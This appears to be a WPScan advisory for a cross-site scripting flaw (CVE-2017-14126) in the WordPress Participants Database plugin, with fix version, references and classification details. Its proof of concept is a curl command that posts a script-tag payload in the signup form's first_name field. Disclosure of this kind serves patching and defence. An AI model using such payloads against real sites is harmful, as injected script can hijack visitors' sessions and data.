Participants Database <= 1.7.5.9 - Cross-Site Scripting
Description
A cross-site scripting (XSS) vulnerability in the WordPress Participants
Database plugin 1.7.5.9 allows attackers to inject arbitrary JavaScript via
the Name parameter (submitted as the first_name field of the signup form).
Proof of Concept
curl -k -F action=signup -F subsource=participants-database \
  -F shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2 \
  -F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 \
  -F 'first_name=<script>alert("1");</script>' -F last_name=a -F email=a@a.com \
  -F mailing_list=No -F submit_button=Submit http://localhost/?page_id=1

Affects Plugin

Fixed in version 1.7.5.10

References

CVE 2017-14126
URL https://limbenjamin.com/articles/cve-2017-14126-participants-database-xss.html

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Benjamin Lim
Submitter Website https://limbenjamin.com
Views 128
Verified No
WPVDB ID 8896

Timeline

Publicly Published 2017-09-06
Added 2017-09-06
Last Updated 2017-09-06

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.